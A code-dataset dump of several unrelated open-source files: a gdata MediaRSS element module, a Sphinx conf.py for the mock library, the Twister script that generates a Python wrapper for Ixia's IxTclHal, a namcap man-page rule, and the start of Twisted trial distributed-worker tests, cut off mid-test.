#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Essential attributes of photos in Google Photos/Picasa Web Albums are
expressed using elements from the `media' namespace, defined in the
MediaRSS specification[1].
Due to copyright issues, the elements herein are documented sparingly, please
consult with the Google Photos API Reference Guide[2], alternatively the
official MediaRSS specification[1] for details.
(If there is a version conflict between the two sources, stick to the
Google Photos API).
[1]: http://search.yahoo.com/mrss (version 1.1.1)
[2]: http://code.google.com/apis/picasaweb/reference.html#media_reference
Keep in mind that Google Photos only uses a subset of the MediaRSS elements
(and some of the attributes are trimmed down, too):
media:content
media:credit
media:description
media:group
media:keywords
media:thumbnail
media:title
"""
__author__ = u'[email protected]'# (Håvard Gulldahl)' #BUG: api chokes on non-ascii chars in __author__
__license__ = 'Apache License v2'
import atom
import gdata
MEDIA_NAMESPACE = 'http://search.yahoo.com/mrss/'
YOUTUBE_NAMESPACE = 'http://gdata.youtube.com/schemas/2007'
class MediaBaseElement(atom.AtomBase):
"""Base class for elements in the MEDIA_NAMESPACE.
To add new elements, you only need to add the element tag name to self._tag
"""
_tag = ''
_namespace = MEDIA_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
def __init__(self, name=None, extension_elements=None,
extension_attributes=None, text=None):
self.name = name
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
class Content(MediaBaseElement):
"""(attribute container) This element describes the original content,
e.g. an image or a video. There may be multiple Content elements
in a media:Group.
For example, a video may have a
<media:content medium="image"> element that specifies a JPEG
representation of the video, and a <media:content medium="video">
element that specifies the URL of the video itself.
Attributes:
url: non-ambigous reference to online object
width: width of the object frame, in pixels
height: width of the object frame, in pixels
medium: one of `image' or `video', allowing the api user to quickly
determine the object's type
type: Internet media Type[1] (a.k.a. mime type) of the object -- a more
verbose way of determining the media type. To set the type member
in the contructor, use the content_type parameter.
(optional) fileSize: the size of the object, in bytes
[1]: http://en.wikipedia.org/wiki/Internet_media_type
"""
_tag = 'content'
_attributes = atom.AtomBase._attributes.copy()
_attributes['url'] = 'url'
_attributes['width'] = 'width'
_attributes['height'] = 'height'
_attributes['medium'] = 'medium'
_attributes['type'] = 'type'
_attributes['fileSize'] = 'fileSize'
def __init__(self, url=None, width=None, height=None,
medium=None, content_type=None, fileSize=None, format=None,
extension_elements=None, extension_attributes=None, text=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
self.url = url
self.width = width
self.height = height
self.medium = medium
self.type = content_type
self.fileSize = fileSize
def ContentFromString(xml_string):
return atom.CreateClassFromXMLString(Content, xml_string)
class Credit(MediaBaseElement):
"""(string) Contains the nickname of the user who created the content,
e.g. `Liz Bennet'.
This is a user-specified value that should be used when referring to
the user by name.
Note that none of the attributes from the MediaRSS spec are supported.
"""
_tag = 'credit'
def CreditFromString(xml_string):
return atom.CreateClassFromXMLString(Credit, xml_string)
class Description(MediaBaseElement):
"""(string) A description of the media object.
Either plain unicode text, or entity-encoded html (look at the `type'
attribute).
E.g `A set of photographs I took while vacationing in Italy.'
For `api' projections, the description is in plain text;
for `base' projections, the description is in HTML.
Attributes:
type: either `text' or `html'. To set the type member in the contructor,
use the description_type parameter.
"""
_tag = 'description'
_attributes = atom.AtomBase._attributes.copy()
_attributes['type'] = 'type'
def __init__(self, description_type=None,
extension_elements=None, extension_attributes=None, text=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
self.type = description_type
def DescriptionFromString(xml_string):
return atom.CreateClassFromXMLString(Description, xml_string)
class Keywords(MediaBaseElement):
"""(string) Lists the tags associated with the entry,
e.g `italy, vacation, sunset'.
Contains a comma-separated list of tags that have been added to the photo, or
all tags that have been added to photos in the album.
"""
_tag = 'keywords'
def KeywordsFromString(xml_string):
return atom.CreateClassFromXMLString(Keywords, xml_string)
class Thumbnail(MediaBaseElement):
"""(attributes) Contains the URL of a thumbnail of a photo or album cover.
There can be multiple <media:thumbnail> elements for a given <media:group>;
for example, a given item may have multiple thumbnails at different sizes.
Photos generally have two thumbnails at different sizes;
albums generally have one cropped thumbnail.
If the thumbsize parameter is set to the initial query, this element points
to thumbnails of the requested sizes; otherwise the thumbnails are the
default thumbnail size.
This element must not be confused with the <gphoto:thumbnail> element.
Attributes:
url: The URL of the thumbnail image.
height: The height of the thumbnail image, in pixels.
width: The width of the thumbnail image, in pixels.
"""
_tag = 'thumbnail'
_attributes = atom.AtomBase._attributes.copy()
_attributes['url'] = 'url'
_attributes['width'] = 'width'
_attributes['height'] = 'height'
def __init__(self, url=None, width=None, height=None,
extension_attributes=None, text=None, extension_elements=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
self.url = url
self.width = width
self.height = height
def ThumbnailFromString(xml_string):
return atom.CreateClassFromXMLString(Thumbnail, xml_string)
class Title(MediaBaseElement):
"""(string) Contains the title of the entry's media content, in plain text.
Attributes:
type: Always set to plain. To set the type member in the constructor, use
the title_type parameter.
"""
_tag = 'title'
_attributes = atom.AtomBase._attributes.copy()
_attributes['type'] = 'type'
def __init__(self, title_type=None,
extension_attributes=None, text=None, extension_elements=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
self.type = title_type
def TitleFromString(xml_string):
return atom.CreateClassFromXMLString(Title, xml_string)
class Player(MediaBaseElement):
"""(string) Contains the embeddable player URL for the entry's media content
if the media is a video.
Attributes:
url: Always set to plain
"""
_tag = 'player'
_attributes = atom.AtomBase._attributes.copy()
_attributes['url'] = 'url'
def __init__(self, player_url=None,
extension_attributes=None, extension_elements=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.url= player_url
class Private(atom.AtomBase):
"""The YouTube Private element"""
_tag = 'private'
_namespace = YOUTUBE_NAMESPACE
class Duration(atom.AtomBase):
"""The YouTube Duration element"""
_tag = 'duration'
_namespace = YOUTUBE_NAMESPACE
_attributes = atom.AtomBase._attributes.copy()
_attributes['seconds'] = 'seconds'
class Category(MediaBaseElement):
"""The mediagroup:category element"""
_tag = 'category'
_attributes = atom.AtomBase._attributes.copy()
_attributes['term'] = 'term'
_attributes['scheme'] = 'scheme'
_attributes['label'] = 'label'
def __init__(self, term=None, scheme=None, label=None, text=None,
extension_elements=None, extension_attributes=None):
"""Constructor for Category
Args:
term: str
scheme: str
label: str
text: str The text data in the this element
extension_elements: list A list of ExtensionElement instances
extension_attributes: dict A dictionary of attribute value string pairs
"""
self.term = term
self.scheme = scheme
self.label = label
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
class Group(MediaBaseElement):
"""Container element for all media elements.
The <media:group> element can appear as a child of an album, photo or
video entry."""
_tag = 'group'
_children = atom.AtomBase._children.copy()
_children['{%s}content' % MEDIA_NAMESPACE] = ('content', [Content,])
_children['{%s}credit' % MEDIA_NAMESPACE] = ('credit', Credit)
_children['{%s}description' % MEDIA_NAMESPACE] = ('description', Description)
_children['{%s}keywords' % MEDIA_NAMESPACE] = ('keywords', Keywords)
_children['{%s}thumbnail' % MEDIA_NAMESPACE] = ('thumbnail', [Thumbnail,])
_children['{%s}title' % MEDIA_NAMESPACE] = ('title', Title)
_children['{%s}category' % MEDIA_NAMESPACE] = ('category', [Category,])
_children['{%s}duration' % YOUTUBE_NAMESPACE] = ('duration', Duration)
_children['{%s}private' % YOUTUBE_NAMESPACE] = ('private', Private)
_children['{%s}player' % MEDIA_NAMESPACE] = ('player', Player)
def __init__(self, content=None, credit=None, description=None, keywords=None,
thumbnail=None, title=None, duration=None, private=None,
category=None, player=None, extension_elements=None,
extension_attributes=None, text=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
self.content=content
self.credit=credit
self.description=description
self.keywords=keywords
self.thumbnail=thumbnail or []
self.title=title
self.duration=duration
self.private=private
self.category=category or []
self.player=player
def GroupFromString(xml_string):
return atom.CreateClassFromXMLString(Group, xml_string)
| apache-2.0 | 2,280,272,921,239,872,500 | 33.059155 | 104 | 0.692002 | false |
mikelalcon/bazel | third_party/py/mock/docs/conf.py | 108 | 6310 | # -*- coding: utf-8 -*-
#
# Mock documentation build configuration file, created by
# sphinx-quickstart on Mon Nov 17 18:12:00 2008.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import sys, os
sys.path.insert(0, os.path.abspath('..'))
from mock import __version__
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.doctest']
doctest_global_setup = """
import os
import sys
import mock
from mock import * # yeah, I know :-/
import unittest2
import __main__
if os.getcwd() not in sys.path:
sys.path.append(os.getcwd())
# keep a reference to __main__
sys.modules['__main'] = __main__
class ProxyModule(object):
def __init__(self):
self.__dict__ = globals()
sys.modules['__main__'] = ProxyModule()
"""
doctest_global_cleanup = """
sys.modules['__main__'] = sys.modules['__main']
"""
html_theme = 'nature'
html_theme_options = {}
# Add any paths that contain templates here, relative to this directory.
#templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.txt'
# The master toctree document.
master_doc = 'index'
# General substitutions.
project = u'Mock'
copyright = u'2007-2012, Michael Foord & the mock team'
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# The short X.Y version.
version = __version__[:3]
# The full version, including alpha/beta/rc tags.
release = __version__
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be searched
# for source files.
exclude_trees = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = False
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'friendly'
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
#html_style = 'adctheme.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
html_use_modindex = False
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Mockdoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
latex_font_size = '12pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
('index', 'Mock.tex', u'Mock Documentation',
u'Michael Foord', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
latex_use_modindex = False | apache-2.0 | 4,843,835,784,331,451,000 | 29.196172 | 82 | 0.711094 | false |
Luxoft/Twister | lib/Ixia/generate.py | 2 | 15483 | #!/usr/bin/env python
# File: generate.py ; This file is part of Twister.
# version: 2.003
# Copyright (C) 2013 , Luxoft
# Authors:
# Adrian Toader <[email protected]>
# Andrei Costachi <[email protected]>
# Andrei Toma <[email protected]>
# Cristi Constantin <[email protected]>
# Daniel Cioata <[email protected]>
# Mihail Tudoran <[email protected]>
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
This file generates Ixia Library wrapper in Python, using TCL functions from IxTclHal.
Params: - IxOS TCL lib path
- IP address of Ixia chassis
'''
from Tkinter import Tcl
from collections import OrderedDict
import re
import socket
import sys
import os
chassis_ip = '10.100.100.45'
tcl_lib_path = '/home/twister/ixos/ixia/lib/ixTcl1.0'
if len(sys.argv) < 3:
print 'Usage: python generate.py <ixos_tcl_lib_path> <chassis_ip_address>'
exit()
tcl_lib_path = sys.argv[1]
chassis_ip = sys.argv[2]
# some minimal checks on IP address
if chassis_ip.count('.') < 3:
print 'ERROR: IP address not valid !'
try:
socket.inet_aton(chassis_ip)
except socket.error:
print 'ERROR: IP address not valid !'
exit()
# check if IxOS tcl lib path exists
if tcl_lib_path[-1] == '/':
tcl_lib_path = tcl_lib_path.rstrip('/')
if not os.path.isdir(tcl_lib_path):
print 'ERROR: IxOS tcl lib path doesn\'t exists'
exit()
tcl = Tcl()
tcl.eval('package req IxTclHal')
tcl.eval('ixConnectToTclServer ' + chassis_ip)
tcl.eval('ixConnectToChassis ' + chassis_ip)
# # # # # # # #
HEAD = """
from Tkinter import Tcl
t = Tcl()
t.eval('package req IxTclHal')
true = True
false = False
yes = True
no = False
none = None
"""
TAIL = """
def ix_exec(cmd):
# This is used for executing custom TCL commands
r = t.eval(cmd)
return r
if __name__ == "__main__":
chassis_ip = '%s'
funcs = [x[0] for x in locals().items() if callable( x[1] )]
# print sorted(funcs)
print 'Found {} functions!'.format(len(funcs))
print 'Is this UNIX?', isUNIX()
print 'Connect to TCL Server:', ixConnectToTclServer(chassis_ip)
print 'Connect to Chassis', ixConnectToChassis(chassis_ip)
print 'Config chassis...'
portList = ''
chassis('get ' + chassis_ip)
py_chassis = chassis('cget -id')
print py_chassis
print 'Config card...'
py_card = 1
card('setDefault')
card('config -txFrequencyDeviation 0')
print py_card
print 'Config port...'
py_port = 1
port('setFactoryDefaults {} {} {}'.format(py_chassis, py_card, py_port))
port('config -speed 100')
port('config -duplex full')
port('config -flowControl false')
print py_port
print 'Config stat...'
stat('setDefault')
stat('config -mode statNormal')
stat('config -enableValidStats false')
stat('config -enableProtocolServerStats true')
stat('config -enableArpStats true')
stat('config -enablePosExtendedStats true')
stat('config -enableDhcpStats false')
stat('config -enableDhcpV6Stats false')
stat('config -enableEthernetOamStats false')
print 'Done.'
print 'Config flexibleTimestamp...'
flexibleTimestamp('setDefault')
flexibleTimestamp('config -type timestampBeforeCrc')
flexibleTimestamp('config -offset 23')
print 'Done.'
print 'Config filter...'
ix_filter('setDefault')
ix_filter('config -captureTriggerDA anyAddr')
ix_filter('config -captureTriggerSA anyAddr')
ix_filter('config -captureTriggerPattern anyPattern')
ix_filter('config -captureTriggerError errAnyFrame')
print 'Done.'
print 'Config filterPallette...'
filterPallette('setDefault')
filterPallette('config -DA1 "00 00 00 00 00 00"')
filterPallette('config -DAMask1 "00 00 00 00 00 00"')
filterPallette('config -DA2 "00 00 00 00 00 00"')
filterPallette('config -DAMask2 "00 00 00 00 00 00"')
filterPallette('config -SA1 "00 00 00 00 00 00"')
filterPallette('config -SAMask1 "00 00 00 00 00 00"')
filterPallette('config -SA2 "00 00 00 00 00 00"')
filterPallette('config -SAMask2 "00 00 00 00 00 00"')
filterPallette('config -pattern1 "DE ED EF FE AC CA"')
filterPallette('config -patternMask1 "00 00 00 00 00 00"')
print 'Done.'
print 'Config capture...'
capture('setDefault')
capture('config -fullAction lock')
capture('config -sliceSize 8191')
print 'Done.'
print 'Config ipAddressTable...'
ipAddressTable('setDefault')
ipAddressTable('config -defaultGateway "0.0.0.0"')
print 'Done.'
print 'Config arpServer...'
arpServer('setDefault')
arpServer('config -retries 3')
arpServer('config -mode arpGatewayOnly')
arpServer('config -rate 208333')
arpServer('config -requestRepeatCount 3')
print 'Done.'
print 'Config interfaceTable...'
interfaceTable('setDefault')
interfaceTable('config -dhcpV4RequestRate 0')
interfaceTable('config -dhcpV6RequestRate 0')
interfaceTable('config -dhcpV4MaximumOutstandingRequests 100')
interfaceTable('config -dhcpV6MaximumOutstandingRequests 100')
#interfaceTable('config -fcoeRequestRate 500')
print 'Done.'
print 'Clear All Interfaces ...'
interfaceTable('clearAllInterfaces')
print 'Done.'
print 'Config protocolServer...'
protocolServer('setDefault')
protocolServer('config -enableArpResponse true')
protocolServer('config -enablePingResponse false')
print 'Done.'
print 'Config oamPort...'
oamPort('setDefault')
oamPort('config -enable false')
oamPort('config -macAddress "00 00 AB BA DE AD"')
oamPort('config -enableLoopback false')
oamPort('config -enableLinkEvents false')
print 'Done.'
print 'Call ixWritePortsToHardware and ixCheckLinkState ...'
# lappend portList [list $chassis $card $port] # ???
ixWritePortsToHardware(portList, None)
ixCheckLinkState(portList)
print 'Done.'
#
""" % (chassis_ip)
# # # # # # # #
def tcl_convert(variable):
"""
This returns the TCL value converted into Pyton string repr.
alnum
Any Unicode alphabet or digit character.
alpha
Any Unicode alphabet character.
ascii
Any character with a value less than \u0080 (those that are in the 7-bit ascii range).
boolean
Any of the forms allowed to Tcl_GetBoolean.
In the case of boolean, true and false, if the function will return 0, then the varname will always be set to 0,
due to the varied nature of a valid boolean value.
control
Any Unicode control character.
digit
Any Unicode digit character. Note that this includes characters outside of the [0-9] range.
double
Any of the valid forms for a double in Tcl, with optional surrounding \
whitespace. In case of under/overflow in the value,
0 is returned and the varname will contain -1.
false
Any of the forms allowed to Tcl_GetBoolean where the value is false.
graph
Any Unicode printing character, except space.
integer
Any of the valid forms for an ordinary integer in Tcl, with optional \
surrounding whitespace. In case of under/overflow in the value,
0 is returned and the varname will contain -1.
lower
Any Unicode lower case alphabet character.
print
Any Unicode printing character, including space.
punct
Any Unicode punctuation character.
space
Any Unicode space character.
true
Any of the forms allowed to Tcl_GetBoolean where the value is true.
upper
Any upper case alphabet character in the Unicode character set.
wordchar
Any Unicode word character. That is any alphanumeric character, and \
any Unicode connector punctuation characters (e.g. underscore).
xdigit
Any hexadecimal digit character ([0-9A-Fa-f]).
"""
global tcl
types = OrderedDict([
['integer', int],
['digit', int],
['double', float],
['true', bool],
['false', bool],
['boolean', bool],
['xdigit', str],
['alnum', str],
['alpha', str],
['ascii', str],
['control', str],
['graph', str],
['lower', str],
['print', str],
['punct', str],
['space', str],
['upper', str],
['wordchar', str],
])
for tcl_type, py_type in types.iteritems():
found = tcl.eval("string is {} -strict ${}".format(tcl_type, variable))
found = int(found)
if found:
value = tcl.getvar('vDefaultArg')
value = str(value)
print 'Converting value `{}` into TCL type `{}`.'.format(value, tcl_type)
if value == 'false' or value == 'no':
return False
elif py_type == str:
return '"{}"'.format(value)
else:
return value
return '!!!'
# # # # # # # #
IX_VARS = {
'from': 'ix_from',
'for': 'ix_for',
'while': 'ix_while',
'file': 'ix_file',
'object': 'ix_object',
'range': 'ix_range',
'map': 'ix_map',
'filter': 'ix_filter',
}
def fix_tcl_var(variable):
""" replace TCL variable """
global IX_VARS
if variable in IX_VARS:
return IX_VARS[variable]
return variable
def fix_tcl_func(func):
""" change TCL function """
global IX_VARS
func = func.replace('::', '_')
if func in IX_VARS:
return IX_VARS[func]
return func
# # # # # # # #
'''
Get Ixia libray version from ixTclHal.tcl file
'''
ixos_version = ''
version_file = tcl_lib_path + '/ixTclHal.tcl'
try:
with open(version_file, 'r') as v_file:
for line in v_file:
if line.startswith('package provide IxTclHal'):
ixos_version = line.split()[-1]
break
except:
print 'ERROR: Cannot get IxOS version. Exiting !'
exit()
# # # # # # # #
'''
Generate functions.txt file from file tclIndex
'''
FUNCTIONS = []
tcl_index_file = tcl_lib_path + '/tclIndex'
try:
for line in open(tcl_index_file).readlines():
if line.startswith('set auto_index(', 0):
line = line.replace('set auto_index(','')
FUNCTIONS.append(line.split(')')[0])
except:
pass
# # # # # # # #
'''
Update functions.txt file from file ixTclSetup.tcl
'''
ix_tcl_setup = tcl_lib_path + '/ixTclSetup.tcl'
try:
file_content = open(ix_tcl_setup, 'r').read()
# get entries from ixTclHal::noArgList
no_arg_list = re.findall('set ixTclHal::noArgList(.*?)\{(.+?)\}',file_content, re.M | re.S)
FUNCTIONS.extend(no_arg_list[0][1].replace('\\','').split())
# get entries from ixTclHal::pointerList
pointer_list = re.findall('set ixTclHal::pointerList(.*?)\{(.+?)\}',file_content, re.M | re.S)
FUNCTIONS.extend(pointer_list[0][1].replace('\\','').split())
# get entries from ixTclHal::command
command_list = re.findall('set ixTclHal::commandList(.*?)\{(.+?)\}',file_content, re.M | re.S)
FUNCTIONS.extend(command_list[0][1].replace('\\','').split())
except:
pass
try:
with open('functions.txt', 'w') as OUTPUT:
OUTPUT.write('\n'.join(FUNCTIONS))
except:
pass
# # # # # # # #
FUNCTIONS = []
for line in open('functions.txt').readlines():
if not line.strip():
continue
if '::' in line:
continue
func_name = line.strip() # TCL Function name
tcl_args = []
tcl_args_long = []
pyc_args = []
pyc_args_long = []
tmpl = '# Function `{}` is invalid'.format(func_name) # Default string, sais the func is invalid
tcl.eval('set vDefaultArg ""')
defaultArgFound = False
defaultArgs = [] # The list of mandatory arguments
try:
# Enable TCL Function. RISK excuting the function!
try:
tcl.eval(func_name)
except:
pass
proc_args = tcl.eval('info args ' + func_name)
for arg in proc_args.split():
has_default = tcl.eval('info default %s %s vDefaultArg' % (func_name, arg))
arg_fixed = fix_tcl_var(arg)
# Args for executing
tcl_args.append(arg)
# Args for calling the TCL function
pyc_args.append(arg_fixed)
# If this argument has a default value
if int(has_default) and tcl.getvar('vDefaultArg'):
defaultArgFound = True
# Args for comment
tcl_args_long.append('%s {%s}' % (arg, str(tcl.getvar('vDefaultArg'))))
# Args for defining Python functions
pyc_args_long.append('%s=%s' % (arg_fixed, str(tcl_convert('vDefaultArg'))))
else:
tcl_args_long.append(arg)
if not defaultArgFound:
pyc_args_long.append(arg_fixed)
else:
defaultArgs.append(arg_fixed)
pyc_args_long.append('%s=None' % (arg_fixed))
# Reset variable for the next cycle
tcl.eval('set vDefaultArg ""')
leng = len(tcl_args)
tcl_args = ', '.join(tcl_args)
tcl_args_long = ' '.join(tcl_args_long)
pyc_args = ', '.join(pyc_args)
pyc_args_long = ', '.join(pyc_args_long)
except Exception, e:
print('>>> Cannot create function `{}`, exception: `{}`!\n'.format(func_name, e))
continue
if defaultArgs:
defaultArgs = '\n'.join([ ' if {0} is None: print "TCL argument ' \
' `{0}` cannot be empty!"; return False'.format(x) for x in defaultArgs ])
tmpl = """
def {py}({py_arg_l}):
'''\n Method Name : {tcl}\n Arguments : {tcl_arg_l}
{def_arg}\n '''
r = t.eval("{tcl} {le}".format({py_arg}))
return r
""".format(py=fix_tcl_func(func_name), tcl=func_name, py_arg=pyc_args, py_arg_l=pyc_args_long,
tcl_arg=tcl_args, tcl_arg_l=tcl_args_long, le='{} '*leng, def_arg=defaultArgs)
else:
tmpl = """
def {py}({py_arg_l}):
'''\n Method Name : {tcl}\n Arguments : {tcl_arg_l} \n '''
r = t.eval("{tcl} {le}".format({py_arg}))
return r
""".format(py=fix_tcl_func(func_name), tcl=func_name, py_arg=pyc_args, py_arg_l=pyc_args_long,
tcl_arg=tcl_args, tcl_arg_l=tcl_args_long, le='{} '*leng)
FUNCTIONS.append(tmpl)
#
output_file = 'TscIxPythonLib_v{}.py'.format(ixos_version)
OUTPUT = open(output_file, 'w')
OUTPUT.write(HEAD)
OUTPUT.write('\n'.join(FUNCTIONS))
OUTPUT.write(TAIL)
OUTPUT.close()
# Eof()
| apache-2.0 | 7,404,327,283,181,116,000 | 29.538462 | 120 | 0.597042 | false |
charactory/namcap | Namcap/fhsmanpages.py | 2 | 1594 | #
# namcap rules - fhsmanpages
# Copyright (C) 2008 Aaron Griffin <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
import os
import tarfile
class package:
def short_name(self):
return "fhs-manpages"
def long_name(self):
return "Verifies correct installation of man pages"
def prereq(self):
return "tar"
def analyze(self, pkginfo, tar):
gooddir = 'usr/share/man'
bad_dir = 'usr/man'
ret = [[],[],[]]
for i in tar.getmembers():
if i.name.startswith(bad_dir):
ret[0].append("Non-FHS man page (" + i.name + ") found. Use /usr/share/man instead")
elif not i.name.startswith(gooddir):
#Check everything else to see if it has a 'man' path component
for part in i.name.split(os.sep):
if part == "man":
ret[1].append("Potential non-FHS man page (" + i.name + ") found.")
return ret
def type(self):
return "tarball"
# vim: set ts=4 sw=4 noet:
| gpl-2.0 | 9,022,469,419,903,615,000 | 33.652174 | 88 | 0.694479 | false |
dparlevliet/zelenka-report-storage | server-db/twisted/trial/_dist/test/test_worker.py | 33 | 14642 | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Test for distributed trial worker side.
"""
import os
from cStringIO import StringIO
from zope.interface.verify import verifyObject
from twisted.trial.reporter import TestResult
from twisted.trial.unittest import TestCase
from twisted.trial._dist.worker import (
LocalWorker, LocalWorkerAMP, LocalWorkerTransport, WorkerProtocol)
from twisted.trial._dist import managercommands, workercommands
from twisted.scripts import trial
from twisted.test.proto_helpers import StringTransport
from twisted.internet.interfaces import ITransport, IAddress
from twisted.internet.defer import fail, succeed
from twisted.internet.main import CONNECTION_DONE
from twisted.internet.error import ConnectionDone
from twisted.python.failure import Failure
from twisted.protocols.amp import AMP
class FakeAMP(AMP):
"""
A fake amp protocol.
"""
class WorkerProtocolTestCase(TestCase):
"""
Tests for L{WorkerProtocol}.
"""
def setUp(self):
"""
Set up a transport, a result stream and a protocol instance.
"""
self.serverTransport = StringTransport()
self.clientTransport = StringTransport()
self.server = WorkerProtocol()
self.server.makeConnection(self.serverTransport)
self.client = FakeAMP()
self.client.makeConnection(self.clientTransport)
def test_run(self):
"""
Calling the L{workercommands.Run} command on the client returns a
response with C{success} sets to C{True}.
"""
d = self.client.callRemote(workercommands.Run, testCase="doesntexist")
def check(result):
self.assertTrue(result['success'])
d.addCallback(check)
self.server.dataReceived(self.clientTransport.value())
self.clientTransport.clear()
self.client.dataReceived(self.serverTransport.value())
self.serverTransport.clear()
return d
def test_start(self):
"""
The C{start} command changes the current path.
"""
curdir = os.path.realpath(os.path.curdir)
self.addCleanup(os.chdir, curdir)
self.server.start('..')
self.assertNotEqual(os.path.realpath(os.path.curdir), curdir)
class LocalWorkerAMPTestCase(TestCase):
"""
Test case for distributed trial's manager-side local worker AMP protocol
"""
def setUp(self):
self.managerTransport = StringTransport()
self.managerAMP = LocalWorkerAMP()
self.managerAMP.makeConnection(self.managerTransport)
self.result = TestResult()
self.workerTransport = StringTransport()
self.worker = AMP()
self.worker.makeConnection(self.workerTransport)
config = trial.Options()
self.testName = "twisted.doesnexist"
config['tests'].append(self.testName)
self.testCase = trial._getSuite(config)._tests.pop()
self.managerAMP.run(self.testCase, self.result)
self.managerTransport.clear()
def pumpTransports(self):
"""
Sends data from C{self.workerTransport} to C{self.managerAMP}, and then
data from C{self.managerTransport} back to C{self.worker}.
"""
self.managerAMP.dataReceived(self.workerTransport.value())
self.workerTransport.clear()
self.worker.dataReceived(self.managerTransport.value())
def test_runSuccess(self):
"""
Run a test, and succeed.
"""
results = []
d = self.worker.callRemote(managercommands.AddSuccess,
testName=self.testName)
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertTrue(results)
def test_runExpectedFailure(self):
"""
Run a test, and fail expectedly.
"""
results = []
d = self.worker.callRemote(managercommands.AddExpectedFailure,
testName=self.testName, error='error',
todo='todoReason')
d.addCallback(lambda result: results.append(result['success']))
self.pumpTransports()
self.assertEqual(self.testCase, self.result.expectedFailures[0][0])
self.assertTrue(results)
def test_runError(self):
"""
Run a test, and encounter an error.
"""
results = []
